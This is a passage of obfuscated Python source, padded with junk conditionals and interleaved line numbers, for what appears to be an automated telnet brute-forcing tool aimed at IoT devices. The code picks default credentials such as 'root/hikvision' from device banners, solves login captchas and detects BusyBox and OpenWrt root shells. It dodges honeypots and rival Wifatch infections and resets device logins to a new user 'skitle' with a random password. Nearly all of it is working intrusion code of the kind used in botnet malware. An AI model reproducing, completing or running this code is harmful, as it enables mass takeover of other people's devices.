 if i1I1I1i1i1i [ 0 ] == 'LRM' and i1I1I1i1i1i [ maxy - 1 ] == 'LRM' and i1I1I1i1i1i [ 1 ] == 'LR' and i1I1I1i1i1i [ maxy - 2 ] == 'LR' and ( i1I1I1i1i1i [ int ( ( maxy - 1 ) / 2 ) ] == 'LRM' or i1I1I1i1i1i [ int ( ( maxy - 1 ) / 2 ) + 1 ] == 'LRM' ) :
5042
  return "8"
5043
 if i1I1I1i1i1i [ 0 ] == 'LRM' and i1I1I1i1i1i [ maxy - 1 ] == 'LRM' and i1I1I1i1i1i [ 1 ] == 'LR' and i1I1I1i1i1i [ maxy - 2 ] == 'R' :
5044
  return "9"
5045
 return "-" ;
5046
 if 57 - 57: OOooOO0 - i1IIi1i1iiI % Oooo
5047
 if 57 - 57: OOOoOooO
5048
 if 18 - 18: I11I1Ii + oOoO0Ooo . O0oo - IIiIii1iI / o0ooO + OOOoOooO
5049
time . sleep ( 3 )
5050
if 70 - 70: IIiIii1iI % IIiIIiIii1I / Oooo
5051
def i1o0o0O00O ( captcha ) :
5052
 ooOO00oOo = ""
5053
 II11oOoOOOOOO = [ ]
5054
 for III1I in captcha . split ( '\n' ) :
5055
  III1I = III1I . split ( '\r' ) [ 0 ]
5056
  if '===========' in III1I :
5057
   continue
5058
  if re . search ( '[A-Za-z]' , III1I ) :
5059
   continue
5060
  if not re . search ( '\s.*\s.*\s.*\s.*\s.*\s.*\s.*\s.*\s.*\s' , III1I ) :
5061
   continue
5062
  II11oOoOOOOOO . append ( III1I )
5063
  if 35 - 35: oOOoO00oo0 + Oo0 / O0oo0OOOOO00
5064
  if 18 - 18: IIiIIiIii1I + IIiII / oOOoO00oo0
5065
 ii1i11iIii1I1i = len ( II11oOoOOOOOO )
5066
 if ii1i11iIii1I1i < 5 :
5067
  return - 1
5068
 OoOO00 = 0
5069
 i1I1Ii = { }
5070
 iIIiIIi11i = 0
5071
 if 98 - 98: i1 / oOOo0000o . oOoO0Ooo
5072
 for III1I in II11oOoOOOOOO :
5073
  i1I1Ii [ iIIiIIi11i ] = { }
5074
  OO00 = 0
5075
  for OOO0OOOoo in III1I :
5076
   i1I1Ii [ iIIiIIi11i ] [ OO00 ] = OOO0OOOoo
5077
   OO00 += 1
5078
  if OO00 > OoOO00 :
5079
   OoOO00 = OO00
5080
   if 23 - 23: O0oo % Oooo + o0oooooO / O0oo0OOOOO00
5081
  iIIiIIi11i += 1
5082
  if 64 - 64: IIiIIiIii1I
5083
  if 47 - 47: IIiIii1iI + O0oo0OOOOO00
5084
 for iIIiIIi11i in range ( ii1i11iIii1I1i ) :
5085
  for OO00 in range ( OoOO00 ) :
5086
   if not OO00 in i1I1Ii [ iIIiIIi11i ] :
5087
    i1I1Ii [ iIIiIIi11i ] [ OO00 ] = ' '
5088
    if 22 - 22: OOOoOooO . Oo0Oo
5089
    if 69 - 69: oOOo0000o * i1IIi1i1iiI + i1IIi1i1iiI * OOOoOooO + Oo0Oo
5090
    if 2 - 2: IIiIIiIii1I . Oo0 % OOOoOooO * O0oo0OOOOO00 % o0ooO - IIiIIiIii1I
5091
 ii1II = { }
5092
 for OO00 in range ( OoOO00 ) :
5093
  oO0OOoo0 = 1
5094
  for iIIiIIi11i in range ( ii1i11iIii1I1i ) :
5095
   if 2 - 2: OOooOO0 * o0oooooO + IIiII * o0ooO / Ii11i1iIi
5096
   if 28 - 28: Ii11i1iIi . o0ooO - O0oo0OOOOO00
5097
   if i1I1Ii [ iIIiIIi11i ] [ OO00 ] != ' ' and i1I1Ii [ iIIiIIi11i ] [ OO00 ] != '\t' :
5098
    oO0OOoo0 = 0
5099
    break
5100
   elif i1I1Ii [ iIIiIIi11i ] [ OO00 ] == ' ' or i1I1Ii [ iIIiIIi11i ] [ OO00 ] == '\t' :
5101
    pass
5102
    if 45 - 45: oOoO0Ooo + Oo0 . oOOoO00oo0 - i1IIi1i1iiI
5103
    if 2 - 2: Ii . Oo0 + IIiIii1iI + i1IIi1i1iiI + IIiIIiIii1I + IIiIIiIii1I
5104
  ii1II [ OO00 ] = oO0OOoo0
5105
  if 83 - 83: IIiII % IIiIIiIii1I % Ii11i1iIi * oOOo0000o
5106
  if 54 - 54: I11I1Ii % I11I1Ii + oOOo0000o . IIiIii1iI + o0oooooO - IIiII
5107
  if 73 - 73: oOOoO00oo0 / O0oo0OOOOO00
5108
 ooOOOOOOO0o00 = - 1
5109
 OoIi = - 1
5110
 OO00 = 0
5111
 while ( OO00 < OoOO00 ) :
5112
  if ii1II [ OO00 ] == 0 :
5113
   ooOOOOOOO0o00 = OO00
5114
   OO00 += 1
5115
   while OO00 < OoOO00 - 1 :
5116
    if ii1II [ OO00 ] == 1 and ii1II [ OO00 + 1 ] == 1 :
5117
     if 21 - 21: O0oo0OOOOO00 - o0oooooO . Ii . O0oo0OOOOO00
5118
     OoIi = OO00
5119
     Iii111iI111I11 = { }
5120
     OoOoo0OooO0o = 0
5121
     for iii1i1I111i111 in range ( ii1i11iIii1I1i ) :
5122
      Iii111iI111I11 [ iii1i1I111i111 ] = { }
5123
      oOoOO = 0
5124
      for ooOO0000O in range ( OoIi - ooOOOOOOO0o00 ) :
5125
       if ii1II [ ooOO0000O + ooOOOOOOO0o00 ] == 1 :
5126
        continue
5127
       Iii111iI111I11 [ iii1i1I111i111 ] [ oOoOO ] = i1I1Ii [ iii1i1I111i111 ] [ ooOO0000O + ooOOOOOOO0o00 ]
5128
       oOoOO += 1
5129
      if oOoOO > OoOoo0OooO0o :
5130
       OoOoo0OooO0o = oOoOO
5131
       if 83 - 83: oOOoO00oo0
5132
     ooOO00oOo += I1ii11 ( Iii111iI111I11 , OoOoo0OooO0o , ii1i11iIii1I1i )
5133
     ooOOOOOOO0o00 = - 1
5134
     OoIi = - 1
5135
     break
5136
    OO00 += 1
5137
  OO00 += 1
5138
 return ooOO00oOo
5139
 if 52 - 52: i1IIi1i1iiI . oOoO0Ooo - IIiIii1iI
5140
def OoO00Ooo0OoOo0O0Oo ( targetip , targetport , bannerhint ) :
5141
 global i1I1
5142
 global OoO0
5143
 global ooo0o00O00
5144
 global i1I1iIIi1
5145
 if not OOoOo00oO0 :
5146
  return
5147
 O0000oO0O = ( targetip , int ( targetport ) )
5148
 o00O0OoOoo = hash ( O0000oO0O )
5149
 if o00O0OoOoo in ooooo0OOo0o :
5150
  if 83 - 83: Ii / Oo0Oo * IIiII % Oo0Oo
5151
  return
5152
  if 18 - 18: OOOoOooO - Oooo + o0oooooO + O0oo - OOooOO0
5153
 i11i1iIIii [ o00O0OoOoo ] = 0
5154
 i1O00o0O [ o00O0OoOoo ] = [ ]
5155
 if 69 - 69: OOooOO0 * O0oo
5156
 if 99 - 99: I11I1Ii - oOOoO00oo0 . IIiIii1iI - oOOoO00oo0 / o0oooooO . IIiII
5157
 if 20 - 20: Ii11i1iIi - oOOoO00oo0
5158
 for I1I1iIIi11I in i1I1iIIi1 :
5159
  if 14 - 14: oOoO0Ooo - i1
5160
  if re . search ( I1I1iIIi11I [ 0 ] , bannerhint ) :
5161
   if 59 - 59: Ii11i1iIi
5162
   i1O00o0O [ o00O0OoOoo ] += I1I1iIIi11I [ 1 : ]
5163
 if targetport != 4719 :
5164
  i1O00o0O [ o00O0OoOoo ] . append ( OoO0 )
5165
 for I1I1iIIi11I in ooo0o00O00 :
5166
  if 14 - 14: oOOo0000o - Oo0
5167
  if re . search ( I1I1iIIi11I [ 0 ] , bannerhint ) :
5168
   if 47 - 47: IIiII / o0oooooO - i1
5169
   i1O00o0O [ o00O0OoOoo ] += I1I1iIIi11I [ 1 : ]
5170
   if 11 - 11: oOOoO00oo0 - IIiIIiIii1I . i1IIi1i1iiI
5171
 if len ( i1O00o0O [ o00O0OoOoo ] ) > 7 :
5172
  while ( len ( i1O00o0O [ o00O0OoOoo ] ) < i1I1 ) :
5173
   i1O00o0O [ o00O0OoOoo ] . append ( random . choice ( iiIO0OOoo ) )
5174
 else :
5175
  if 12 - 12: i1IIi1i1iiI . oOOoO00oo0 % IIiIIiIii1I + I11I1Ii + IIiIIiIii1I / i1
5176
  i1O00o0O [ o00O0OoOoo ] += I1IIiI1i
5177
  if 37 - 37: i1 % oOOo0000o
5178
  while ( len ( i1O00o0O [ o00O0OoOoo ] ) < i1I1 ) :
5179
   i1O00o0O [ o00O0OoOoo ] . append ( random . choice ( iiIO0OOoo ) )
5180
   if 71 - 71: oOOoO00oo0 % O0oo
5181
   if 21 - 21: O0oo0OOOOO00 + Ii + Oo0 . Ii
5182
 IIIi1iI1111Ii [ o00O0OoOoo ] = ( targetip , int ( targetport ) , bannerhint )
5183
 OOOOoO00oOoO [ o00O0OoOoo ] = 0
5184
 O0o [ o00O0OoOoo ] = None
5185
 I1IiIii1I1 [ o00O0OoOoo ] = ""
5186
 iIi1ii1I [ o00O0OoOoo ] = 0
5187
 O0o0iI [ o00O0OoOoo ] = ""
5188
 ooooo0OOo0o . append ( o00O0OoOoo )
5189
 if 39 - 39: Oo0 % i1
5190
def IIOooO0oo00oo ( targetip , targetport , bannerhint , masterhash ) :
5191
 O0000oO0O = ( targetip , int ( targetport ) )
5192
 if 21 - 21: O0oo
5193
 O0OOo00o00o = socket . socket ( socket . AF_INET , socket . SOCK_STREAM )
5194
 O0OOo00o00o . setblocking ( 0 )
5195
 if 90 - 90: Ii11i1iIi - o0ooO - IIiII . O0oo - I11I1Ii % I11I1Ii
5196
 try :
5197
  O0OOo00o00o . connect ( O0000oO0O )
5198
 except :
5199
  pass
5200
  if 100 - 100: IIiIii1iI - IIiIIiIii1I * Oooo - oOOo0000o * I11I1Ii
5201
 o00O0OoOoo = hash ( O0OOo00o00o )
5202
 i1IIII11I . append ( O0OOo00o00o )
5203
 IiIi [ o00O0OoOoo ] = ( targetip , int ( targetport ) , bannerhint )
5204
 iiI1iIi1Ii1Iii [ o00O0OoOoo ] = 0
5205
 if 29 - 29: o0oooooO * i1 / IIiII / oOOoO00oo0
5206
 if targetport == 9527 :
5207
  iiI1iIi1Ii1Iii [ o00O0OoOoo ] = - 1
5208
 ooOo0 [ o00O0OoOoo ] = [ ]
5209
 iIiO00000o [ o00O0OoOoo ] = 0
5210
 O0Oo [ o00O0OoOoo ] = ''
5211
 O0OO0oOoO0O00 [ o00O0OoOoo ] = ''
5212
 Oo000o [ o00O0OoOoo ] = time . time ( )
5213
 o0O00ooo00OOo [ o00O0OoOoo ] = ''
5214
 IIi1ii1iI11I1 [ o00O0OoOoo ] = ''
5215
 OoOoO0o000 [ o00O0OoOoo ] = 0
5216
 oooo00O [ o00O0OoOoo ] = ''
5217
 o0oO0o [ o00O0OoOoo ] = masterhash
5218
 O0o [ masterhash ] = O0OOo00o00o
5219
 return O0OOo00o00o
5220
 if 93 - 93: o0ooO * Oo0 . Ii11i1iIi * o0ooO % o0oooooO
5221
def Oo0oooOo00 ( brutehash ) :
5222
 i11i1iIIii [ brutehash ] = None
5223
 i1O00o0O [ brutehash ] = None
5224
 IIIi1iI1111Ii [ brutehash ] = None
5225
 OOOOoO00oOoO [ brutehash ] = None
5226
 O0o [ brutehash ] = None
5227
 I1IiIii1I1 [ brutehash ] = None
5228
 iIi1ii1I [ brutehash ] = None
5229
 O0o0iI [ brutehash ] = None
5230
 ooooo0OOo0o . remove ( brutehash )
5231
 if 1 - 1: OOooOO0
5232
def ooOO ( sock ) :
5233
 global i1I1
5234
 global OoO00
5235
 global iiIII11I1i1Ii
5236
 global I1i
5237
 if 62 - 62: IIiII % oOoO0Ooo * OOOoOooO - Ii
5238
 o00O0OoOoo = hash ( sock )
5239
 try :
5240
  sock . close ( )
5241
 except :
5242
  pass
5243
  if 86 - 86: IIiII + IIiIIiIii1I . o0oooooO . OOOoOooO
5244
 IIiIIiIiIi = o0oO0o [ o00O0OoOoo ]
5245
 if 38 - 38: I11I1Ii - OOooOO0
5246
 if 34 - 34: OOOoOooO / IIiIIiIii1I % i1IIi1i1iiI % OOOoOooO
5247
 if 23 - 23: oOOo0000o . oOOo0000o / oOOoO00oo0 + Oooo - I11I1Ii * Ii
5248
 if 49 - 49: i1IIi1i1iiI * O0oo % I11I1Ii - IIiIIiIii1I . O0oo
5249
 if 43 - 43: i1 . Oooo % oOOo0000o % Oo0Oo + Ii11i1iIi . Ii
5250
 if 37 - 37: oOOo0000o * O0oo
5251
 if iiI1iIi1Ii1Iii [ o00O0OoOoo ] >= 5 and ( iiIII11I1i1Ii or I1i ) :
5252
  if 84 - 84: Oo0 * o0ooO . o0ooO % O0oo / i1
5253
  iii = I1IiIii1I1 [ IIiIIiIiIi ]
5254
  if iii == 'honeypot' or iii == 'mtguest' :
5255
   iIi1ii1I [ IIiIIiIiIi ] = 9999
5256
  if iii == '' :
5257
   iii = 'unknown'
5258
  Ooo0 = ''
5259
  if o0O00ooo00OOo [ o00O0OoOoo ] :
5260
   Ooo0 = o0O00ooo00OOo [ o00O0OoOoo ] + '/'
5261
  elif IIi1ii1iI11I1 [ o00O0OoOoo ] :
5262
   Ooo0 = O0o0iI [ IIiIIiIiIi ] . split ( '/' ) [ 0 ] + '/'
5263
  if IIi1ii1iI11I1 [ o00O0OoOoo ] :
5264
   Ooo0 += IIi1ii1iI11I1 [ o00O0OoOoo ]
5265
  oOo00o00O = re . sub ( '\r?\n' , ';' , O0Oo [ o00O0OoOoo ] )
5266
  oOo00o00O = re . sub ( '[^A-Za-z0-9 \.,:;<>\(\)\[\]\-+%!@/#$=]' , '' , oOo00o00O )
5267
  if not I1i or iii == 'unknown' or iii == 'telnet' :
5268
   Ii111i11iIi ( "%s:%d BR:%s:%s:%s:%s" % ( IIIi1iI1111Ii [ IIiIIiIiIi ] [ 0 ] , IIIi1iI1111Ii [ IIiIIiIiIi ] [ 1 ] , iii , O0o0iI [ IIiIIiIiIi ] , Ooo0 , oOo00o00O [ : 8192 ] ) ) ;
5269
  else :
5270
   Ii111i11iIi ( "%s:%d BR:%s:%s:%s:%s" % ( IIIi1iI1111Ii [ IIiIIiIiIi ] [ 0 ] , IIIi1iI1111Ii [ IIiIIiIiIi ] [ 1 ] , iii , O0o0iI [ IIiIIiIiIi ] , Ooo0 , oOo00o00O [ : 32 ] ) ) ;
5271
   if 89 - 89: IIiII - IIiIii1iI + Ii * IIiIii1iI * IIiII
5272
   if 16 - 16: o0ooO / o0oooooO - i1IIi1i1iiI
5273
   if 62 - 62: Oooo
5274
 Iioo0OooOoO = time . time ( )
5275
 if OOOOoO00oOoO [ IIiIIiIiIi ] <= Iioo0OooOoO :
5276
  OOOOoO00oOoO [ IIiIIiIiIi ] = time . time ( ) + OoO00
5277
 O0o [ IIiIIiIiIi ] = None
5278
 iIi1ii1I [ IIiIIiIiIi ] += 1
5279
 if 35 - 35: I11I1Ii
5280
 if iIi1ii1I [ IIiIIiIiIi ] >= i1I1 :
5281
  if 49 - 49: IIiIIiIii1I + oOOo0000o % Ii11i1iIi
5282
  if 38 - 38: IIiIii1iI + o0ooO * i1IIi1i1iiI
5283
  Oo0oooOo00 ( IIiIIiIiIi )
5284
  if 27 - 27: O0oo0OOOOO00 + Oo0 - o0ooO + oOOo0000o
5285
  if 92 - 92: IIiIii1iI % IIiII
5286
  if 81 - 81: oOOoO00oo0 - Ii11i1iIi * o0oooooO / oOOoO00oo0 % o0ooO
5287
  if 96 - 96: Ii11i1iIi + o0oooooO . Ii11i1iIi - OOooOO0 + OOooOO0
5288
  if 8 - 8: o0oooooO + oOoO0Ooo % OOooOO0
5289
  if 5 - 5: Ii11i1iIi * O0oo0OOOOO00 * IIiII * o0ooO
5290
  if 8 - 8: Oooo * IIiIii1iI . Ii . IIiII . O0oo0OOOOO00
5291
  if 95 - 95: I11I1Ii - i1 . Oo0 . o0ooO - o0ooO / o0ooO
5292
 i1IIII11I . remove ( sock )
5293
 IiIi [ o00O0OoOoo ] = None
5294
 iiI1iIi1Ii1Iii [ o00O0OoOoo ] = None
5295
 ooOo0 [ o00O0OoOoo ] = None
5296
 iIiO00000o [ o00O0OoOoo ] = None
5297
 O0Oo [ o00O0OoOoo ] = None
5298
 O0OO0oOoO0O00 [ o00O0OoOoo ] = None
5299
 Oo000o [ o00O0OoOoo ] = None
5300
 o0O00ooo00OOo [ o00O0OoOoo ] = None
5301
 IIi1ii1iI11I1 [ o00O0OoOoo ] = None
5302
 OoOoO0o000 [ o00O0OoOoo ] = None
5303
 o0oO0o [ o00O0OoOoo ] = None
5304
 oooo00O [ o00O0OoOoo ] = None
5305
 if 24 - 24: o0oooooO
5306
def OoOO0Oo ( ) :
5307
 Iioo0OooOoO = time . time ( )
5308
 for IIIiiiI in ooooo0OOo0o :
5309
  IIiIIiIiIi = hash ( IIIiiiI )
5310
  if O0o [ IIiIIiIiIi ] == None :
5311
   if 60 - 60: I11I1Ii
5312
   if Iioo0OooOoO >= OOOOoO00oOoO [ IIiIIiIiIi ] :
5313
    if 53 - 53: Ii11i1iIi % Oo0Oo
5314
    O0OOo00o00o = IIOooO0oo00oo ( IIIi1iI1111Ii [ IIiIIiIiIi ] [ 0 ] , IIIi1iI1111Ii [ IIiIIiIiIi ] [ 1 ] , IIIi1iI1111Ii [ IIiIIiIiIi ] [ 2 ] , IIiIIiIiIi )
5315
    O0o [ IIiIIiIiIi ] = O0OOo00o00o
5316
    OOOOoO00oOoO [ IIiIIiIiIi ] = 0
5317
    if 2 - 2: Ii11i1iIi . O0oo0OOOOO00 % IIiIIiIii1I
5318
def ii1iI1I11 ( sock , brutehash , masterhash ) :
5319
 global oOooOooO0ooO
5320
 if 45 - 45: o0oooooO + I11I1Ii / IIiIIiIii1I - IIiIIiIii1I - Oooo
5321
 if 57 - 57: o0oooooO % O0oo
5322
 if 'cabhCdpServerRouter: 127.0.0.1' in O0Oo [ brutehash ] and len ( ooOo0 [ brutehash ] ) > 2 :
5323
  ooOo0 [ brutehash ] = ooOo0 [ brutehash ] [ 2 : ]
5324
  O0Oo [ brutehash ] = re . sub ( "cabhCdpServerRouter: 127.0.0.1" , '(already set)' , O0Oo [ brutehash ] )
5325
  if 21 - 21: I11I1Ii . Oooo / i1IIi1i1iiI
5326
  if 7 - 7: oOOoO00oo0 * i1IIi1i1iiI - o0oooooO - Oooo * i1IIi1i1iiI
5327
 if len ( ooOo0 [ brutehash ] ) <= 1 :
5328
  if 91 - 91: O0oo0OOOOO00
5329
  iIiO00000o [ brutehash ] = time . time ( ) + 10
5330
  iiI1iIi1Ii1Iii [ brutehash ] = 9
5331
  try :
5332
   sock . shutdown ( )
5333
  except :
5334
   pass
5335
  ooOo0 [ brutehash ] = ''
5336
  return 0
5337
  if 43 - 43: Ii - Oooo
5338
 oOo0 = True
5339
 while ooOo0 [ brutehash ] [ 1 ] == '' or oOo0 :
5340
  if 97 - 97: oOOo0000o * O0oo % OOooOO0 % o0ooO * o0ooO
5341
  if '%' in ooOo0 [ brutehash ] [ 0 ] :
5342
   if '%OLDUSER%' in ooOo0 [ brutehash ] [ 0 ] :
5343
    ooOo0 [ brutehash ] [ 0 ] = re . sub ( '%OLDUSER%' , O0o0iI [ masterhash ] . split ( '/' ) [ 0 ] , ooOo0 [ brutehash ] [ 0 ] )
5344
   if '%OLDPASS%' in ooOo0 [ brutehash ] [ 0 ] :
5345
    ooOo0 [ brutehash ] [ 0 ] = re . sub ( '%OLDPASS%' , O0o0iI [ masterhash ] . split ( '/' ) [ 1 ] , ooOo0 [ brutehash ] [ 0 ] )
5346
   if '%NEWUSER%' in ooOo0 [ brutehash ] [ 0 ] :
5347
    o0O00ooo00OOo [ brutehash ] = 'skitle'
5348
    ooOo0 [ brutehash ] [ 0 ] = re . sub ( '%NEWUSER%' , 'skitle' , ooOo0 [ brutehash ] [ 0 ] )
5349
   if '%NEWPASS%' in ooOo0 [ brutehash ] [ 0 ] :
5350
    if IIi1ii1iI11I1 [ brutehash ] == '' :
5351
     IIi1ii1iI11I1 [ brutehash ] = '' . join ( random . choice ( 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz012345678901234567890123456789' ) for i in range ( 8 ) )
5352
    ooOo0 [ brutehash ] [ 0 ] = re . sub ( '%NEWPASS%' , IIi1ii1iI11I1 [ brutehash ] , ooOo0 [ brutehash ] [ 0 ] )
5353
   if '%TARGETIP%' in ooOo0 [ brutehash ] [ 0 ] :
5354
    ooOo0 [ brutehash ] [ 0 ] = re . sub ( '%TARGETIP%' , IIIi1iI1111Ii [ masterhash ] [ 0 ] , ooOo0 [ brutehash ] [ 0 ] )
5355
   if '%TARGETPORT%' in ooOo0 [ brutehash ] [ 0 ] :
5356
    ooOo0 [ brutehash ] [ 0 ] = re . sub ( '%TARGETPORT%' , '%d' % ( IIIi1iI1111Ii [ masterhash ] [ 1 ] ) , ooOo0 [ brutehash ] [ 0 ] )
5357
   if '%RELAUNCH%' in ooOo0 [ brutehash ] [ 0 ] :
5358
    if 15 - 15: i1 * i1
5359
    i1O00o0O [ masterhash ] = [ 'root/20080826' , 'root/20080826' , 'root/20080826' ]
5360
    i11i1iIIii [ masterhash ] = 0
5361
    ooOO ( sock )
5362
    return 0
5363
    if 65 - 65: i1IIi1i1iiI
5364
    if 57 - 57: o0oooooO / I11I1Ii * IIiIii1iI * Ii11i1iIi % Oooo
5365
   if '%RELAUNCH2%' in ooOo0 [ brutehash ] [ 0 ] :
5366
    if 81 - 81: Ii11i1iIi * Ii11i1iIi / Ii * IIiII
5367
    if 1 - 1: i1IIi1i1iiI . i1IIi1i1iiI - oOoO0Ooo
5368
    i1O00o0O [ masterhash ] = [ 'root/hikvision' , 'root/hikvision' , O0o0iI [ masterhash ] , O0o0iI [ masterhash ] ]
5369
    i11i1iIIii [ masterhash ] = 0
5370
    ooOO ( sock )
5371
    return 0
5372
    if 100 - 100: Ii11i1iIi / oOOo0000o . o0ooO
5373
  OooOO0OO = '\n'
5374
  if oooo00O [ brutehash ] == 'R' :
5375
   OooOO0OO = '\r\n'
5376
  try :
5377
   if 10 - 10: oOOo0000o . O0oo0OOOOO00
5378
   sock . send ( ooOo0 [ brutehash ] [ 0 ] + OooOO0OO )
5379
  except :
5380
   pass
5381
  if ooOo0 [ brutehash ] [ 1 ] == '' :
5382
   if len ( ooOo0 [ brutehash ] ) <= 2 :
5383
    if 93 - 93: O0oo0OOOOO00
5384
    iIiO00000o [ brutehash ] = time . time ( ) + 10
5385
    iiI1iIi1Ii1Iii [ brutehash ] = 9
5386
    try :
5387
     sock . shutdown ( )
5388
    except :
5389
     pass
5390
    ooOo0 [ brutehash ] = ''
5391
    return 0
5392
   else :
5393
    ooOo0 [ brutehash ] = ooOo0 [ brutehash ] [ 2 : ]
5394
  else :
5395
   oOo0 = False
5396
   if 94 - 94: oOOoO00oo0 . Ii11i1iIi / o0ooO * OOOoOooO . i1IIi1i1iiI / oOOo0000o
5397
 if len ( ooOo0 [ brutehash ] ) <= 0 :
5398
  return 0
5399
  if 95 - 95: oOoO0Ooo . I11I1Ii % oOOoO00oo0
5400
 iIiO00000o [ brutehash ] = time . time ( ) + oOooOooO0ooO
5401
 O0OO0oOoO0O00 [ brutehash ] = ''
5402
 return 1
5403
 if 45 - 45: OOOoOooO
5404
i11IiiI1 = { }
5405
if 26 - 26: I11I1Ii / Ii11i1iIi - Oooo
5406
def OOO0000OO0oO0 ( ) :
5407
 global ooiI1
5408
 global O0oOOoO
5409
 global oOoOOoooo0
5410
 global oOooOooO0ooO
5411
 global i11IiiI1
5412
 if 35 - 35: OOOoOooO - IIiIIiIii1I % Ii / o0ooO + IIiII
5413
 Iioo0OooOoO = time . time ( )
5414
 if 52 - 52: oOOo0000o + o0ooO % Oooo - i1IIi1i1iiI - IIiIii1iI
5415
 if 19 - 19: IIiII % Ii11i1iIi
5416
 O00Oo = 0.01
5417
 IIiI1i , O0o0 , IiIIiI11I = select . select ( i1IIII11I , i1IIII11I , [ ] , O00Oo )
5418
 for O0O0 in i1IIII11I :
5419
  o00O0OoOoo = hash ( O0O0 )
5420
  try :
5421
   o0oo0OOOo = O0O0 . getsockopt ( socket . SOL_SOCKET , socket . SO_ERROR )
5422
  except :
5423
   o0oo0OOOo = - 1
5424
  if o0oo0OOOo != 0 :
5425
   if 81 - 81: O0oo0OOOOO00 - Ii % OOooOO0 - Ii11i1iIi + Oo0Oo
5426
   ooOO ( O0O0 )
5427
   continue
5428
  if O0O0 in IIiI1i :
5429
   O0 = ''
5430
   try :
5431
    O0 = O0O0 . recv ( 2048 )
5432
   except :
5433
    pass
5434
    if 44 - 44: I11I1Ii . O0oo * Ii - i1IIi1i1iiI - o0ooO * IIiII
5435
   try :
5436
    for ii1iI1ii in re . findall ( '\xff\xfd.' , O0 ) :
5437
     O0O0 . send ( '\xff\xfc' + ii1iI1ii [ 2 ] )
5438
    for oo0OOO0OOoOO in re . findall ( '\xff\xfb.' , O0 ) :
5439
     O0O0 . send ( '\xff\xfe' + oo0OOO0OOoOO [ 2 ] )
5440
   except :
5441
    pass
5442
   if O0 :
5443
    O0Oo [ o00O0OoOoo ] += O0
5444
    O0OO0oOoO0O00 [ o00O0OoOoo ] += O0
5445
    if 17 - 17: O0oo0OOOOO00 % i1 - IIiIii1iI
5446
    if iiI1iIi1Ii1Iii [ o00O0OoOoo ] == 0 :
5447
     if 31 - 31: IIiIii1iI % oOOo0000o
5448
     if 24 - 24: Oo0Oo . oOoO0Ooo / oOOoO00oo0
5449
     if 37 - 37: IIiII * oOOo0000o - O0oo / oOOoO00oo0 / oOoO0Ooo + i1
5450
     if ( 'BusyBox v' in O0Oo [ o00O0OoOoo ] and ( '# ' in O0Oo [ o00O0OoOoo ] or '$ ' in O0Oo [ o00O0OoOoo ] ) ) or ( 'Linux ' in O0Oo [ o00O0OoOoo ] and ( '# ' in O0Oo [ o00O0OoOoo ] [ - 2 : ] or '$ ' in O0Oo [ o00O0OoOoo ] [ - 2 : ] ) and not '##' in O0Oo [ o00O0OoOoo ] and not '$$' in O0Oo [ o00O0OoOoo ] ) :
5451
      IIiIIiIiIi = o0oO0o [ o00O0OoOoo ]
5452
      iiI1iIi1Ii1Iii [ o00O0OoOoo ] = 5
5453
      if 23 - 23: Oooo - OOOoOooO + Oooo + Oo0
5454
      O0o0iI [ IIiIIiIiIi ] = 'root/BUSYBOXBLANK'
5455
      continue
5456
      if 80 - 80: OOooOO0 - oOOoO00oo0 * O0oo0OOOOO00 / Oooo * Oo0Oo / oOoO0Ooo
5457
     if OoOoO0o000 [ o00O0OoOoo ] == 0 and 'Please input the verification code:' in O0Oo [ o00O0OoOoo ] :
5458
      ooOO00oOo = ''
5459
      try :
5460
       ooOO00oOo = i1o0o0O00O ( O0Oo [ o00O0OoOoo ] )
5461
      except :
5462
       Ii111i11iIi ( "ERR: BCS crashed" )
5463
       pass
5464
       if 23 - 23: Oooo
5465
      try :
5466
       O0O0 . send ( ooOO00oOo + '\n' )
5467
      except :
5468
       pass
5469
      OoOoO0o000 [ o00O0OoOoo ] = 1
5470
     if 'to set your login password' in O0Oo [ o00O0OoOoo ] and 'passwd' in O0Oo [ o00O0OoOoo ] and 'root@' in O0Oo [ o00O0OoOoo ] :
5471
      IIiIIiIiIi = o0oO0o [ o00O0OoOoo ]
5472
      iiI1iIi1Ii1Iii [ o00O0OoOoo ] = 5
5473
      if 75 - 75: IIiIIiIii1I + Oo0 * o0ooO - OOooOO0 - Oo0Oo
5474
      O0o0iI [ IIiIIiIiIi ] = 'root/OPENWRTBLANK'
5475
      continue
5476
     if 'APPCOM:' in O0Oo [ o00O0OoOoo ] or 'DEBUG avc:' in O0Oo [ o00O0OoOoo ] or 'Polycom Command Shell' in O0Oo [ o00O0OoOoo ] :
5477
      if 86 - 86: oOOo0000o / IIiIIiIii1I - i1IIi1i1iiI
5478
      IIiIIiIiIi = o0oO0o [ o00O0OoOoo ]
5479
      iiI1iIi1Ii1Iii [ o00O0OoOoo ] = 5
5480
      O0o0iI [ IIiIIiIiIi ] = '<blank>/<blank>'
5481
      if 90 - 90: Oo0Oo % OOooOO0 - i1
5482
      continue
5483
     if 'REINCARNA' in O0Oo [ o00O0OoOoo ] and 'Wifatch' in O0Oo [ o00O0OoOoo ] :
5484
      if 68 - 68: oOOo0000o + IIiIii1iI
5485
      if 56 - 56: o0oooooO + Oooo * Oo0Oo - Oo0
5486
      IIiIIiIiIi = o0oO0o [ o00O0OoOoo ]
5487
      ooOO ( O0O0 )
5488
      Oo0oooOo00 ( IIiIIiIiIi )
5489
      continue
5490
     if 'Command line is locked now' in O0Oo [ o00O0OoOoo ] :
5491
      if 60 - 60: Ii11i1iIi + O0oo0OOOOO00 * Ii - OOOoOooO + I11I1Ii / IIiII
5492
      ooOO ( O0O0 )
5493
      continue
5494
     if 'You have to wait' in O0Oo [ o00O0OoOoo ] :
5495
      Oo00oO0O = re . search ( 'You have to wait (\d+) min (\d+) sec' , O0Oo [ o00O0OoOoo ] )
5496
      if Oo00oO0O :
5497
       if 53 - 53: Oooo . oOoO0Ooo
5498
       IIiIIiIiIi = o0oO0o [ o00O0OoOoo ]
5499
       oooO0ooo0o000 = int ( Oo00oO0O . group ( 1 ) )
5500
       IiIiIIi1I1 = int ( Oo00oO0O . group ( 2 ) )
5501
       OOOOoO00oOoO [ IIiIIiIiIi ] = Iioo0OooOoO + IiIiIIi1I1 + oooO0ooo0o000 * 60 ;
5502
       if 57 - 57: oOOo0000o % i1
5503
       if 64 - 64: Ii . I11I1Ii * Oo0Oo / O0oo0OOOOO00 % o0oooooO
5504
      ooOO ( O0O0 )
5505
      continue
5506
      if 29 - 29: oOOo0000o - I11I1Ii / oOOoO00oo0 + i1IIi1i1iiI
5507
